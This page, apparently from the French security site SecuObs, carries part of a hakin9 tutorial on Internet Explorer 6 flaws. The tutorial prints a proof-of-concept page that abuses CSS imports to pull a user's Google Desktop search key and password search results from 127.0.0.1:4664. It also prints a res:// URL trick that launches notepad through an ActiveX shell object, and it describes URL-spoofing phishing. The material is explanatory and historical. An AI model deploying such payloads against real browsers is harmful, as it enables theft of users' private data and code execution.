Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Tutoriels

English version with Google Translate

[Sécurité avec Microsoft Internet Explorer – Partie 3] Attaques sur l'application Google Desktop

Par Krysztof Kozlowski, hakin9
Le 22/10/2007


Résumé : Microsoft Internet Explorer 6, « réputé » pour sa sécurité, a permis, à l'aide de l'application Google Desktop dans sa version 2, à des attaquants d'obtenir l'accès aux données sensibles des utilisateurs. Retrouvez dans cette partie les explications sur la méthode utilisée pour récupérer des documents et des mails indexés par Google Desktop à l'aide de MSIE6. - Lire l'article



Et voici un exemple avec cette attaque, des faiblesses de Microsoft Internet Explorer, opérée afin de récupérer des informations sensibles sur l'utilisateur et cela à l'aide de l'applicatif tiers Google Desktop ( lien ).

Un grand nombre d'internautes étaient probablement déjà prudents en ce qui concernait l'astuce, très populaire et utilisée par de nombreux spammeurs à l'époque, consistant à créer des adresses URL ( lien ) web avec des noms d'utilisateurs qui ressemblaient à des noms d'hôtes ; à cause de cette astuce, les utilisateurs de Microsoft Internet Explorer faisaient parfois trop confiance à des pages qui étaient potentiellement très dangereuses.

Un exemple avec l'URL suivante « www.microsoft.com&session%123123123@krzysi ek.software.com.pl. » ; cette astuce était souvent utilisée pour voler des comptes du type Paypal ( lien ) et elle consistait à duper leurs utilisateurs en les invitant à fournir leur mot de passe contre de faux prétextes. Les utilisateurs croyaient en effet, suite à la réception d'un message préalablement forgée de manière spécifique, que leur mot de passe avait été effacé ou mal saisi ; ce message était en fait généré par un mécanisme incluant une page d'authentification spécifique préalablement forgée vers laquelle était redirigé ensuite l'utilisateur.

Il était alors invité à changer de mot de passe en saisissant dans un premier temps son ancien mot de passe, l'offrant ainsi à l'initiateur du phishing qui pouvait dès lors s'en servir à des fins malicieuses avec les conséquences que cela avait pour la victime. Une version améliorée de cette attaque permettait de la rendre plus efficace ; il suffisait d'ajouter la valeur 0x01 derrière le symbole @ dans l'adresse faussée. Il était alors possible de faire en sorte que Microsoft Internet Explorer n'affiche pas la suite de l'adresse, par exemple : www.microsoft.com&session%123123123@0x01kr zysIEk.software.com.pl

On a découvert qu'il était possible d'utiliser Google Desktop pour accéder à distance aux données privées de l'utilisateur telles que les numéros de cartes bancaires stockées localement et les mots de passe d'accès à différents services en plus de ce qui concerne le cercle familial & strictement privé. Il était possible de le faire via une page Internet préalablement forgée et spécifique à cause de quelques faiblesses dans la conception même de Microsoft Internet Explorer.

Une personne mal intentionnée pouvait alors forcer les internautes à lancer une recherche ayant pour résultats les sites Internet qui se servaient malicieusement de ces faiblesses.


En quoi ces faiblesses, consistent-elles et comment les utiliser ?

Il suffisait d'avoir la version 6 de Microsoft Internet Explorer, ce qui ne représentait pas une grande difficulté puisque que cette version a été l'une des plus populaires et les plus utilisées ; il était également requis d'avoir installé la version 2 de Google Desktop. Dans ces conditions réunies, il était alors possible de tester ces faiblesses à l'aide du script suivant :



<html>
<head>
<title>Utilisation des faiblesses de Internet Explorer et Google Desktop</title>
<style type="text/css">
@import url("news.google.com/news?hl=en&ned=pl&q=%7D%7B"); </style>
</head> <body>
<h2>Utilisation des faiblesses de Internet Explorer et Google Desktop</
h2>
<br><center>
Le code HTML modifié importé via CSS depuis Google News. Dans ce cas-là, il s'agit du lien à un ordinateur local :
<br>
<textarea rows="26" cols="70" id="nowesssrc"></textarea>
<p>
La clé de Google Desktop téléchargée du lien :
<br>
<input type="text" size="50" id="clé">
<p>
Les résultats de Google Desktop sur un ordinateur local pour le mot « mot de passe » en HTML cru après le traitement CSS :
<br>
<textarea rows="24" cols="90" id="résultats">
Veuillez attendre les résultats</textarea>
<p>
La page originale du message de Google Desktop de l'ordinateur local : <br>
<iframe width="500" height="250" id="page"></iframe>
<p>
<script>
function showResults() {
document.getElementById("résultats") .innerText = document.styleS heets(0) .imports(1) .cssText;
}

document.getElementById("nowesssrc") .innerText = document.styleShee ts(0) .imports(0) .cssText;
var re = new RegExp("127.0.0.1:4664/search&s=(.+?)\?q");
var reRes = re.exec(document.styleSheets(0) .imports(0) .cssText);
if (reRes) {

// Affiche la clé analysée

document.getElementById("clé") .innerText = reRes[ 1];

// Ajoute la clé correcte à l 'adresse du serveur local et ajoute la requête du mot de passe au lien

var searchURL = "127.0.0.1:4664/search&s= " + reRes[1] + "q=%7Bpassword";
document. styleSheets (0) . addImport (searchURL);

// Affiche la page de recherche dans un cadre

document.getElementById("page") .src = searchURL;

// Patientez quelques secondes avec la page de résultats

setTimeout('showResults() ', 5000);

} else {

// Si vous ne réussissez pas à analyser la clé, affichez l 'erreur

document.getElementById("clé") .innerText = "impossible de télécharger le lien Google Desktop"; document.getElementById("résultats") .innerText = "Impossible de télécharger les résultats Google Desktop";

}

</script>
</body> </html>



Voici un exemple d'une autre erreur déjà corrigée dans la version 5 de Microsoft Internet Explorer qui permettait ici de lancer une application de type bloc-notes sur le système d'exploitation :

<html>
<body>
<script>
function Notatnik() {
var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style
%3E%3Cscript%20language%3D%27j script%27%3Ea%3D
new%20ActiveXObj ect%28%27Shell.Application%27%29%3Ba.
ShellExecute%28%2 7notepad%27%2 9%3B%3C/script%3E
%3C%21--//%7C0%7C0%7C0%7 C0%7C0%7C0%7C0%7C0';
document.location = url;
}

</script>
<center></font>

Si on cliquait alors sur le bouton dans le navigateur IE5 et que le correctif MS06-044 n'était pas installé, on pouvait lancer le bloc-notes :

<font face="Verdana, Arial, Helvetica, sans-serif" color="#003366"><br> <br>
<input type='button' onClick='Notatnik()' value='Lancer le bloc-note'>
</body>
</html>




NB : Il est possible de s'abonner au magazine Hakin9 et d'acheter directement le dernier numéro ou d'anciens numéros, en cliquant sur l'image ci-dessous :

Software-Wydawnictwo



Autres ressources dans ce dossier :

[Sécurité avec Microsoft Internet Explorer – Partie 1] Introduction et rappel – lien

[Sécurité avec Microsoft Internet Explorer – Partie 2] Présentation et statistiques - lien

[Sécurité avec Microsoft Internet Explorer – Partie 4] Cascading Style Sheets Cross Site Scripting ou CSSXSS - lien

[Sécurité avec Microsoft Internet Explorer – Partie 5] Exploitation de Google Desktop et exécution distante de code - lien

[Sécurité avec Microsoft Internet Explorer – Partie 6] Prise de contrôle du filtre d'exceptions critiques - lien

[Sécurité avec Microsoft Internet Explorer – Partie 7] Crédits & références - lien



Les mots clés pour les articles publiés sur SecuObs : sécurité microsoft internet google
Les articles de la revue de presse sur les mots clés : microsoft internet google
Les videos sur SecuObs pour les mots clés : microsoft internet google
Les éléments de la revue Twitter pour les mots clés : microsoft internet google
Voir tous les articles de "Krysztof Kozlowski" publiés sur SecuObs (7 résultats)
Voir tous les articles publiés par l'organisme "hakin9" sur SecuObs (11 résultats)


- Article suivant : [Sécurité avec Microsoft Internet Explorer – Partie 4] Cascading Style Sheets Cross Site Scripting ou CSSXSS
- Article précédent : [Sécurité avec Microsoft Internet Explorer – Partie 2] Présentation et statistiques
- Article suivant dans la catégorie Tutoriels : [Sécurité avec Microsoft Internet Explorer – Partie 4] Cascading Style Sheets Cross Site Scripting ou CSSXSS
- Article précédent dans la catégorie Tutoriels : [Sécurité avec Microsoft Internet Explorer – Partie 2] Présentation et statistiques

Les derniers commentaires publiés pour cet article:
- Google SketchUp lib3ds 3DS Importer Memory Corruption ...

Les derniers commentaires de la catégorie Tutoriels:
- UPDATE Snort 2.9.1.1 ...
- Apache Issues Patch To Stop Reverse-Proxy Bypass Attack ...
- ESRT @HackerTheDude @r0bertmart1nez @xanda @morenops - Kernel hacking the BSD way, new post ...
- ESRT @room362 - The Dirty Little Secrets They Didn't Teach You In Pentesting Class ...
- ESRT @jcran @dkarg - Metasploit Payloads VS Libemu - Alienvault Labs ...

Les derniers articles de la catégorie Tutoriels :
- PktAnon un framework pour l anonymat des traces PCAP
- [NessusWX – Partie 2] Audits et conclusion
- [NessusWX – Partie 1] Introduction, installation et configuration
- [IDS Snort Windows – Partie 4] Conclusion et webographie
- [IDS Snort Windows – Partie 3] Exemple de fichier de configuration
- [IDS Snort Windows – Partie 2] Installation et configuration
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- [Sécurité et PHP - Partie 5] Astuces
- [Sécurité et PHP - Partie 4] Remote PHP Vulnerabilty Scanner
- [Sécurité et PHP - Partie 3] Les failles PHP




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :